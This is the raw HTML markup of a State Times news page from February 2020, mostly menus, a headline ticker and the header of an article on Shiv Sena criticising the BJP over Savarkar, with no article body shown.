class='long-arrow-icon'></i></a></div><div class=' mom-cat-latest' id='mn-latest-58084' data-id='1355' data-object='category' data-layout=''><ul id='mn-ul-latest-58084'></ul><a href='http://news.statetimes.in/section/news/jknews/courts/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div><div class=' mom-cat-latest' id='mn-latest-58081' data-id='1349' data-object='category' data-layout=''><ul id='mn-ul-latest-58081'></ul><a href='http://news.statetimes.in/section/news/jknews/art-culture/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div></div> 
</div>
</div>
<i class='responsive-caret'></i>
</li>
<li id="menu-item-58092" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-parent-item mom_default_menu_item menu-item-depth-0"><a href="http://news.statetimes.in/section/exclusive/">Exclusive</a>
<ul class="sub-menu ">
	<li id="menu-item-58093" class="menu-item menu-item-type-taxonomy menu-item-object-post_tag mom_default_menu_item active menu-item-depth-1"><a href="http://news.statetimes.in/topic/dost-khan/">Dost Khan</a></li>
	<li id="menu-item-58094" class="menu-item menu-item-type-taxonomy menu-item-object-post_tag mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/topic/blunt-butcher/">Blunt Butcher</a></li>
	<li id="menu-item-58095" class="menu-item menu-item-type-taxonomy menu-item-object-post_tag mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/topic/pride-or-shame-2/">Pride or Shame</a></li>
</ul>
<i class='responsive-caret'></i>
</li>
<li id="menu-item-58096" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-0"><a href="http://news.statetimes.in/section/editorial/">Editorial</a></li>
<li id="menu-item-58104" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-parent-item mom_mega_cats menu-item-depth-0"><a href="http://news.statetimes.in/section/news/world/">World</a><div class='cats-mega-wrap '>
<div class="cats-mega-inner">

<ul class="sub-menu ">
	<li id="menu-item-58101" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent mom_default_menu_item active menu-item-depth-1"><a href="http://news.statetimes.in/section/news/india-national/">National</a></li>
	<li id="menu-item-58105" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/world/">World</a></li>
	<li id="menu-item-58100" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/business/">Business</a></li>
	<li id="menu-item-58103" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/sports/">Sports</a></li>
	<li id="menu-item-58102" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/science-tech/">Science n Tech</a></li>
</ul>
<div class='subcat'><div class='active mom-cat-latest' id='mn-latest-58101' data-id='20' data-object='category' data-layout=''><ul id='mn-ul-latest-58101'><li class='has-thumbnail' ><div class='subcat-thumbnail'><a href='http://news.statetimes.in/cbi-arrests-illegal-migrant-after-22-years-on-rcn-basis/' title='CBI arrests illegal migrant after 22 years on RCN basis'><img src='http://news.statetimes.in/wp-content/uploads/2016/10/CBI-registers-FIR-against-UK-based-arms-dealer-in-Embraer-deal.jpg?x39047' alt='CBI arrests illegal migrant after 22 years on RCN basis' width='70' height='47'></a></div><div class='subcat-title'><a href='http://news.statetimes.in/cbi-arrests-illegal-migrant-after-22-years-on-rcn-basis/' title='CBI arrests illegal migrant after 22 years on RCN basis'> CBI arrests illegal migrant after 22 years on RCN basis</a><span> - 55 mins ago</span></div></li><li class='has-thumbnail' ><div class='subcat-thumbnail'><a href='http://news.statetimes.in/bjp-using-savarkar-as-shield-for-neo-nationalism-politics-sena/' title='BJP using Savarkar as shield for neo-nationalism politics: Sena'><img src='http://news.statetimes.in/wp-content/uploads/2019/03/Shiv-Sena-1.jpg?x39047' alt='BJP using Savarkar as shield for neo-nationalism politics: Sena' width='70' height='47'></a></div><div class='subcat-title'><a href='http://news.statetimes.in/bjp-using-savarkar-as-shield-for-neo-nationalism-politics-sena/' title='BJP using Savarkar as shield for neo-nationalism politics: Sena'> BJP using Savarkar as shield for neo-nationalism politics: Sena</a><span> - 1 hour ago</span></div></li><li class='has-thumbnail' ><div class='subcat-thumbnail'><a href='http://news.statetimes.in/cong-govt-in-punjab-suffering-from-karo-na-virus-opposition/' title='Cong govt in Punjab suffering from &#8216;karo na&#8217; virus: Opposition'><img src='http://news.statetimes.in/wp-content/uploads/2020/02/Cong-govt-in-Punjab-suffering-from-karo-na-virus-Opposition.jpg?x39047' alt='Cong govt in Punjab suffering from &#8216;karo na&#8217; virus: Opposition' width='70' height='47'></a></div><div class='subcat-title'><a href='http://news.statetimes.in/cong-govt-in-punjab-suffering-from-karo-na-virus-opposition/' title='Cong govt in Punjab suffering from &#8216;karo na&#8217; virus: Opposition'> Cong govt in Punjab suffering from &#8216;karo na&#8217; virus: Opposition</a><span> - 1 hour ago</span></div></li><li class='has-thumbnail' ><div class='subcat-thumbnail'><a href='http://news.statetimes.in/transfer-of-justice-muralidhar-done-on-recommendation-of-sc-collegium-ravi-shankar-prasad/' title='Transfer of Justice Muralidhar done on recommendation of SC collegium: Ravi Shankar Prasad'><img src='http://news.statetimes.in/wp-content/uploads/2015/02/ravi-shankar-prasad.jpg?x39047' alt='Transfer of Justice Muralidhar done on recommendation of SC collegium: Ravi Shankar Prasad' width='70' height='47'></a></div><div class='subcat-title'><a href='http://news.statetimes.in/transfer-of-justice-muralidhar-done-on-recommendation-of-sc-collegium-ravi-shankar-prasad/' title='Transfer of Justice Muralidhar done on recommendation of SC collegium: Ravi Shankar Prasad'> Transfer of Justice Muralidhar done on recommendation of SC collegium: Ravi Shankar Prasad</a><span> - 1 hour ago</span></div></li></ul><a href='http://news.statetimes.in/section/news/india-national/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div><div class=' mom-cat-latest' id='mn-latest-58105' data-id='9' data-object='category' data-layout=''><ul id='mn-ul-latest-58105'></ul><a href='http://news.statetimes.in/section/news/world/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div><div class=' mom-cat-latest' id='mn-latest-58100' data-id='22' data-object='category' data-layout=''><ul id='mn-ul-latest-58100'></ul><a href='http://news.statetimes.in/section/news/business/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div><div class=' mom-cat-latest' id='mn-latest-58103' data-id='21' data-object='category' data-layout=''><ul id='mn-ul-latest-58103'></ul><a href='http://news.statetimes.in/section/news/sports/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div><div class=' mom-cat-latest' id='mn-latest-58102' data-id='23' data-object='category' data-layout=''><ul id='mn-ul-latest-58102'></ul><a href='http://news.statetimes.in/section/news/science-tech/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div></div> 
</div>
</div>
<i class='responsive-caret'></i>
</li>
<li id="menu-item-58106" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-parent-item mom_mega_cats menu-item-depth-0"><a href="http://news.statetimes.in/section/entertainment/">Entertainment</a><div class='cats-mega-wrap mom_cats_horizontal'>
<div class="cats-mega-inner">

<ul class="sub-menu ">
	<li id="menu-item-58107" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item active menu-item-depth-1"><a href="http://news.statetimes.in/section/entertainment/bollywod/">Bollywood</a></li>
	<li id="menu-item-58108" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/entertainment/hollywood/">Hollywood</a></li>
	<li id="menu-item-58109" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/entertainment/movies/">Movies</a></li>
	<li id="menu-item-58110" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/entertainment/television/">Television</a></li>
</ul>
<div class='subcat'><div class='active mom-cat-latest' id='mn-latest-58107' data-id='11' data-object='category' data-layout='horz'><ul id='mn-ul-latest-58107'><li class='has-thumbnail' ><div class='subcat-thumbnail'><a href='http://news.statetimes.in/way-forward-for-any-country-is-by-educating-itself-more-shah-rukh/' title='Way forward for any country is by educating itself more: Shah Rukh'><img src='http://news.statetimes.in/wp-content/uploads/2016/11/Shah-Rukh-Khan-turns-51.jpg?x39047' alt='Way forward for any country is by educating itself more: Shah Rukh' width='117' height='74'></a></div><div class='subcat-title'><a href='http://news.statetimes.in/way-forward-for-any-country-is-by-educating-itself-more-shah-rukh/' title='Way forward for any country is by educating itself more: Shah Rukh'> Way forward for any country is by educating itself more: Shah Rukh</a><span>  3 hours ago</span></div></li><li class='has-thumbnail' ><div class='subcat-thumbnail'><a href='http://news.statetimes.in/prabhas-to-work-in-mahanati-director-nag-ashwins-next/' title='Prabhas to work in &#8216;Mahanati&#8217; director Nag Ashwin&#8217;s next'><img src='http://news.statetimes.in/wp-content/uploads/2020/02/Prabhas-to-work-in-Mahanati-director-Nag-Ashwins-next.jpg?x39047' alt='Prabhas to work in &#8216;Mahanati&#8217; director Nag Ashwin&#8217;s next' width='117' height='74'></a></div><div class='subcat-title'><a href='http://news.statetimes.in/prabhas-to-work-in-mahanati-director-nag-ashwins-next/' title='Prabhas to work in &#8216;Mahanati&#8217; director Nag Ashwin&#8217;s next'> Prabhas to work in &#8216;Mahanati&#8217; director Nag Ashwin&#8217;s next</a><span>  1 day ago</span></div></li><li class='has-thumbnail' ><div class='subcat-thumbnail'><a href='http://news.statetimes.in/john-abraham-to-produce-biopic-on-revathi-roy/' title='John Abraham to produce biopic on Revathi Roy'><img src='http://news.statetimes.in/wp-content/uploads/2020/02/John-Abraham-to-produce-biopic-on-Revathi-Roy.jpg?x39047' alt='John Abraham to produce biopic on Revathi Roy' width='117' height='74'></a></div><div class='subcat-title'><a href='http://news.statetimes.in/john-abraham-to-produce-biopic-on-revathi-roy/' title='John Abraham to produce biopic on Revathi Roy'> John Abraham to produce biopic on Revathi Roy</a><span>  2 days ago</span></div></li></ul><a href='http://news.statetimes.in/section/entertainment/bollywod/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div><div class=' mom-cat-latest' id='mn-latest-58108' data-id='12' data-object='category' data-layout='horz'><ul id='mn-ul-latest-58108'></ul><a href='http://news.statetimes.in/section/entertainment/hollywood/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div><div class=' mom-cat-latest' id='mn-latest-58109' data-id='13' data-object='category' data-layout='horz'><ul id='mn-ul-latest-58109'></ul><a href='http://news.statetimes.in/section/entertainment/movies/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div><div class=' mom-cat-latest' id='mn-latest-58110' data-id='14' data-object='category' data-layout='horz'><ul id='mn-ul-latest-58110'></ul><a href='http://news.statetimes.in/section/entertainment/television/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div></div> 
</div>
</div>
<i class='responsive-caret'></i>
</li>
<li id="menu-item-58854" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-0"><a href="http://news.statetimes.in/section/lifestyle/">Lifestyle</a></li>
<li id="menu-item-58857" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-parent-item mom_default_menu_item menu-item-depth-0"><a href="http://news.statetimes.in/media-gallery/">Media Gallery</a>
<ul class="sub-menu ">
	<li id="menu-item-58858" class="menu-item menu-item-type-post_type menu-item-object-page mom_default_menu_item active menu-item-depth-1"><a href="http://news.statetimes.in/image-gallery/">Image Gallery</a></li>
	<li id="menu-item-58856" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/video/">Video Gallery</a></li>
</ul>
<i class='responsive-caret'></i>
</li>
<li id="menu-item-58859" class="menu-item menu-item-type-post_type menu-item-object-page mom_default_menu_item menu-item-depth-0"><a href="http://news.statetimes.in/jobs/">Job Portal</a></li>
</ul>                                                                <div class="device-menu-wrap mom_visibility_device">
                        <div id="menu-holder" class="device-menu-holder">
                            <i class="fa-icon-align-justify mh-icon"></i> <span class="the_menu_holder_area"><i class="dmh-icon"></i>Menu</span><i class="mh-caret"></i>
                        </div>
                        <ul id="menu-primary-two-1" class="device-menu mom_visibility_device"><li id="menu-item-58059" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home mom_default_menu_item menu-item-iconsOnly menu-item-depth-0"><a href="http://news.statetimes.in/"><i class="icon_only momizat-icon-home"></i><span class="icon_only_label">Home</span></a></li>
<li id="menu-item-58080" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-parent-item mom_mega_cats menu-item-depth-0"><a href="http://news.statetimes.in/section/news/jknews/">Jammu and Kashmir</a><div class='cats-mega-wrap '>
<div class="cats-mega-inner">

<ul class="sub-menu ">
	<li id="menu-item-58091" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item active menu-item-depth-1"><a href="http://news.statetimes.in/section/news/jknews/topjknews/">Top J&#038;K News</a></li>
	<li id="menu-item-58083" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/jknews/local-news/">Cities &#038; Towns</a></li>
	<li id="menu-item-58086" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/jknews/jksports/">J&#038;K Sports</a></li>
	<li id="menu-item-58085" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/jknews/crime-watch/">Crime Watch</a></li>
	<li id="menu-item-58084" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/jknews/courts/">Courts</a></li>
	<li id="menu-item-58081" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/jknews/art-culture/">Art &#038; Culture</a></li>
</ul>
<i class='responsive-caret'></i>
</li>
<li id="menu-item-58092" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-parent-item mom_default_menu_item menu-item-depth-0"><a href="http://news.statetimes.in/section/exclusive/">Exclusive</a>
<ul class="sub-menu ">
	<li id="menu-item-58093" class="menu-item menu-item-type-taxonomy menu-item-object-post_tag mom_default_menu_item active menu-item-depth-1"><a href="http://news.statetimes.in/topic/dost-khan/">Dost Khan</a></li>
	<li id="menu-item-58094" class="menu-item menu-item-type-taxonomy menu-item-object-post_tag mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/topic/blunt-butcher/">Blunt Butcher</a></li>
	<li id="menu-item-58095" class="menu-item menu-item-type-taxonomy menu-item-object-post_tag mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/topic/pride-or-shame-2/">Pride or Shame</a></li>
</ul>
<i class='responsive-caret'></i>
</li>
<li id="menu-item-58096" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-0"><a href="http://news.statetimes.in/section/editorial/">Editorial</a></li>
<li id="menu-item-58104" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-parent-item mom_mega_cats menu-item-depth-0"><a href="http://news.statetimes.in/section/news/world/">World</a><div class='cats-mega-wrap '>
<div class="cats-mega-inner">

<ul class="sub-menu ">
	<li id="menu-item-58101" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent mom_default_menu_item active menu-item-depth-1"><a href="http://news.statetimes.in/section/news/india-national/">National</a></li>
	<li id="menu-item-58105" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/world/">World</a></li>
	<li id="menu-item-58100" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/business/">Business</a></li>
	<li id="menu-item-58103" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/sports/">Sports</a></li>
	<li id="menu-item-58102" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/science-tech/">Science n Tech</a></li>
</ul>
<i class='responsive-caret'></i>
</li>
<li id="menu-item-58106" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-parent-item mom_mega_cats menu-item-depth-0"><a href="http://news.statetimes.in/section/entertainment/">Entertainment</a><div class='cats-mega-wrap mom_cats_horizontal'>
<div class="cats-mega-inner">

<ul class="sub-menu ">
	<li id="menu-item-58107" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item active menu-item-depth-1"><a href="http://news.statetimes.in/section/entertainment/bollywod/">Bollywood</a></li>
	<li id="menu-item-58108" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/entertainment/hollywood/">Hollywood</a></li>
	<li id="menu-item-58109" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/entertainment/movies/">Movies</a></li>
	<li id="menu-item-58110" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/entertainment/television/">Television</a></li>
</ul>
<i class='responsive-caret'></i>
</li>
<li id="menu-item-58854" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-0"><a href="http://news.statetimes.in/section/lifestyle/">Lifestyle</a></li>
<li id="menu-item-58857" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-parent-item mom_default_menu_item menu-item-depth-0"><a href="http://news.statetimes.in/media-gallery/">Media Gallery</a>
<ul class="sub-menu ">
	<li id="menu-item-58858" class="menu-item menu-item-type-post_type menu-item-object-page mom_default_menu_item active menu-item-depth-1"><a href="http://news.statetimes.in/image-gallery/">Image Gallery</a></li>
	<li id="menu-item-58856" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/video/">Video Gallery</a></li>
</ul>
<i class='responsive-caret'></i>
</li>
<li id="menu-item-58859" class="menu-item menu-item-type-post_type menu-item-object-page mom_default_menu_item menu-item-depth-0"><a href="http://news.statetimes.in/jobs/">Job Portal</a></li>
</ul>                        </div>
                                            		    <div class="nav-buttons">
                                        			<span class="nav-button nav-login">
			    <i class="momizat-icon-users"></i>
			</span>
			<div class="nb-inner-wrap">
			    <div class="nb-inner lw-inner">
			                            <div class="mom-login-widget">
                                                        <form class="mom-login-form" action="http://news.statetimes.in/wp-login.php" method="post">
					<div class="mom-username">
						<input type="text" name="log" value="" placeholder="username">
					</div>

					<div class="mom-password">
						<input type="password" name="pwd" value="" placeholder="password">
					</div>

					<div class="mom-submit-wrapper">
						<button class="button submit user-submit" name="user-submit" type="submit">Log In</button>
						<input type="checkbox" id="rememberme" name="rememberme" value="forever" >
						<label for="rememberme"><i class="fa-icon-ok"></i>Remember Me</label>
                                                <input type="hidden" name="redirect_to" value="http://news.statetimes.in/bjp-using-savarkar-as-shield-for-neo-nationalism-politics-sena/" />
					</div>
										<span class="mlw-extra">
																		<a href="http://news.statetimes.in/wp-login.php?action=lostpassword" class="mlw-reset">Lost your Password</a>
											</span>
					                            </form>
                            			    <div class="clear"></div>
                        </div>
			    </div>
			</div>
		    		                        <span class="nav-button nav-search">
                        <i class="fa-icon-search"></i>
                    </span>
                    <div class="nb-inner-wrap search-wrap border-box">
                        <div class="nb-inner sw-inner">
                        <div class="search-form mom-search-form">
                            <form method="get" action="http://news.statetimes.in">
                                <input class="sf" type="text" placeholder="Search ..." autocomplete="off" name="s">
                                <button class="button" type="submit"><i class="fa-icon-search"></i></button>
                            </form>
                            <span class="sf-loading"><img src="http://news.statetimes.in/wp-content/themes/goodnews5/images/ajax-search-nav.gif?x39047" alt="loading..." width="16" height="16"></span>
                        </div>
                    <div class="ajax_search_results">
                    </div> <!--ajax search results-->
                    </div> <!--sw inner-->
                    </div> <!--search wrap-->
                    
                            <span class="nav-button nav-social-button twitter"><a target="_blank" class="vector_icon" href="https://www.twitter.com/state_times"><i class="fa-icon-twitter"></i></a></span>
        
                <span class="nav-button nav-social-button facebook"><a target="_blank" class="vector_icon" href="https://www.facebook.com/statetimes"><i class="fa-icon-facebook "></i></a></span>        
        
                   <span class="nav-button nav-social-button gplus"><a target="_blank" class="vector_icon" href="https://plus.google.com/112398265041024324940/" ><i class="fa-icon-google-plus"></i></a></span>     
        
        
                        <span class="nav-button nav-social-button youtube"><a target="_blank" class="vector_icon" href="https://www.youtube.com/statetimes1"><i class="fa-icon-youtube"></i></a></span>
                

        

        
        
                <span class="nav-button nav-social-button tumblr"><a target="_blank" class="vector_icon" href="http://statetimes1.tumblr.com"><i class="fa-icon-tumblr"></i></a></span>
                             <span class="nav-button nav-social-button rss"><a target="_blank" class="vector_icon" href="http://news.statetimes.in/feed/"><i class="fa-icon-rss"></i></a></span>
        	
			    </div> <!--nav-buttons-->

                </div>
                </div> <!--nav inner-->
            </nav> <!--Navigation-->
            	    <div class="boxed-content-wrapper clearfix">
                        <div class="nav-shaddow"></div>
                         <div style="margin-top:-17px; margin-bottom:20px;"></div>
            
            <div class="inner">
                        
        <div class="breaking-news">
    <div class="the_ticker" style="margin:0;">
    <div class="bn-title"><span>Latest News</span></div>
    <div class="news-ticker animation-updown custom-animation" data-timeout="5000">
        <ul>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/cbi-arrests-illegal-migrant-after-22-years-on-rcn-basis/">CBI arrests illegal migrant after 22 years on RCN basis</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/bjp-using-savarkar-as-shield-for-neo-nationalism-politics-sena/">BJP using Savarkar as shield for neo-nationalism politics: Sena</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/cong-govt-in-punjab-suffering-from-karo-na-virus-opposition/">Cong govt in Punjab suffering from &#8216;karo na&#8217; virus: Opposition</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/transfer-of-justice-muralidhar-done-on-recommendation-of-sc-collegium-ravi-shankar-prasad/">Transfer of Justice Muralidhar done on recommendation of SC collegium: Ravi Shankar Prasad</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/pm-modi-greets-karnataka-cm-yediyurappa-on-his-77th-birthday/">PM Modi greets Karnataka CM Yediyurappa on his 77th birthday</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/sonia-gandhi-led-cong-delegation-meets-kovind-over-delhi-violence/">Sonia Gandhi-led Cong delegation meets Kovind over Delhi violence</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/plea-by-injured-jamia-student-for-compensation-hc-seeks-govt-police-stand/">Plea by injured Jamia student for compensation: HC seeks govt, police stand</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/northeast-delhi-violence-death-toll-reaches-34/">Northeast Delhi violence: Death toll reaches 34</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/rahanes-mantra-for-2nd-test-show-more-intent-and-negate-angles-created-by-nz-pacers/">Rahane&#8217;s mantra for 2nd Test: Show more intent and negate angles created by NZ pacers</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/expect-tokyo-olympics-to-go-ahead-as-scheduled-despite-coronavirus-concerns-rijiju/">Expect Tokyo Olympics to go ahead as scheduled despite coronavirus concerns: Rijiju</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/bjps-politics-of-revenge-exposed-cong-on-transfer-of-delhi-hc-judge-muralidhar/">BJP&#8217;s politics of revenge exposed: Cong on transfer of Delhi HC Judge Muralidhar</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/way-forward-for-any-country-is-by-educating-itself-more-shah-rukh/">Way forward for any country is by educating itself more: Shah Rukh</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/paramilitary-personnel-provide-security-cover-for-last-journey-of-man-killed-in-delhi-clashes/">Paramilitary personnel provide security cover for last journey of man killed in Delhi clashes</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/ssp-inaugurates-shaheed-kamal-kishore-memorial-volleyball-tournament/">SSP inaugurates Shaheed Kamal Kishore Memorial Volleyball Tournament</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/court-convicts-11-in-law-student-rape-case/">Court convicts 11 in law student rape case</a></li>
        </ul>
    </div> <!--news ticker-->
    </div>
        </div> <!--breaking news-->
            </div>
    <div class="inner">
        
                            <div class="main_container">
           <div class="main-col">
                                <div class="category-title">
                        <div class="mom_breadcrumb breadcrumb breadcrumbs"><div class="breadcrumbs-plus">
<span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a itemprop="url" href="http://news.statetimes.in/" class="home"><span itemprop="title">Home</span></a></span> <span class='separator'><i class="sep fa-icon-double-angle-right"></i></span> <span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a itemprop="url" href="http://news.statetimes.in/section/news/" title="News"><span itemprop="title">News</span></a></span> <span class='separator'><i class="sep fa-icon-double-angle-right"></i></span> <span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a itemprop="url" href="http://news.statetimes.in/section/news/india-national/" title="India"><span itemprop="title">India</span></a></span> <span class='separator'><i class="sep fa-icon-double-angle-right"></i></span> <span itemprop="name">BJP using Savarkar as shield for neo-nationalism politics: Sena</span></div></div>                </div>
                                        <div class="base-box blog-post p-single bp-horizontal-share post-588931 post type-post status-publish format-standard category-india-national category-imp-today"itemscope itemtype="http://schema.org/Article">
<div itemprop="image" itemscope itemtype="https://schema.org/ImageObject">
    <meta itemprop="url" content="http://news.statetimes.in/wp-content/uploads/2019/03/Shiv-Sena-1.jpg">
    <meta itemprop="width" content="300">
    <meta itemprop="height" content="300">
  </div>
  <meta itemscope itemprop="mainEntityOfPage"  itemType="https://schema.org/WebPage" itemid="http://news.statetimes.in/bjp-using-savarkar-as-shield-for-neo-nationalism-politics-sena/"/>

  <div itemprop="publisher" itemscope itemtype="https://schema.org/Organization">
    <div itemprop="logo" itemscope itemtype="https://schema.org/ImageObject">
      <meta itemprop="url" content="http://news.statetimes.in/wp-content/uploads/2015/04/stlogosmall.jpg">
      <meta itemprop="width" content="445">
      <meta itemprop="height" content="77">
    </div>
        <meta itemprop="name" content="State Times">
  </div>
  <meta itemprop="datePublished" content="2020-02-27T12:59:15+00:00"/>
  <meta itemprop="dateModified" content="2020-02-27T12:59:26+00:00"/>

<h1 class="post-tile entry-title" itemprop="headline">BJP using Savarkar as shield for neo-nationalism politics: Sena</h1>
<div class="mom-post-meta single-post-meta"><span>on: <time datetime="2020-02-27T12:59:15+00:00" class="updated">February 27, 2020</time></span><span>In: <a href="http://news.statetimes.in/section/news/india-national/" title="View all posts in India">India</a>, <a href="http://news.statetimes.in/section/news/imp-today/" title="View all posts in Latest News">Latest News</a></span><span>Tags: </span><span><a href="http://news.statetimes.in/bjp-using-savarkar-as-shield-for-neo-nationalism-politics-sena/#respond">No Comments</a></span><div class="post-tools"><a href="javascript:window.print()" rel="nofollow" class="print"><i class="fa-icon-print"> </i>Print</a><a href="mailto:?subject=BJP using Savarkar as shield for neo-nationalism politics: Sena&body=BJP using Savarkar as shield for neo-nationalism politics: Sena http://news.statetimes.in/bjp-using-savarkar-as-shield-for-neo-nationalism-politics-sena/" rel="nofollow" class="email"><i class="fa-icon-envelope"> </i>Email</a></div></div><div class="entry-content">
               <div class="mom-social-share ss-horizontal border-box php-share" data-id="588931">
                    <div class="ss-icon facebook">
                <a href="#" onclick="window.open('http://www.facebook.com/sharer/sharer.php?u=http://news.statetimes.in/bjp-using-savarkar-as-shield-for-neo-nationalism-politics-sena/', 'Share This', 'menubar=no,toolbar=no,resizable=no,scrollbars=no, width=600,height=455');"><span class="icon"><i class="fa-icon-facebook"></i>Share</span></a>
                <span class="count">0</span>
            </div> <!--icon-->
        
                    <div class="ss-icon twitter">
                <a href="http://twitter.com/share?text=BJP using Savarkar as shield for neo-nationalism politics: Sena&url=http://news.statetimes.in/bjp-using-savarkar-as-shield-for-neo-nationalism-politics-sena/" onclick="window.open(this.href, 'Post this on twitter', 'menubar=no,toolbar=no,resizable=no,scrollbars=no,width=600,height=455');"><span class="icon"><i class="fa-icon-twitter"></i>Tweet</span></a>
            </div> <!--icon-->
        
                    <div class="ss-icon googleplus">
                <a href="#"
onclick="window.open('https://plus.google.com/share?url=http://news.statetimes.in/bjp-using-savarkar-as-shield-for-neo-nationalism-politics-sena/', '', 'menubar=no,toolbar=no,resizable=no,scrollbars=no,height=455,width=600');return false"><span class="icon"><i class="fa-icon-google-plus"></i>Share</span></a>
            </div> <!--icon-->
                                    <div class="ss-icon linkedin">
                <a href="#"
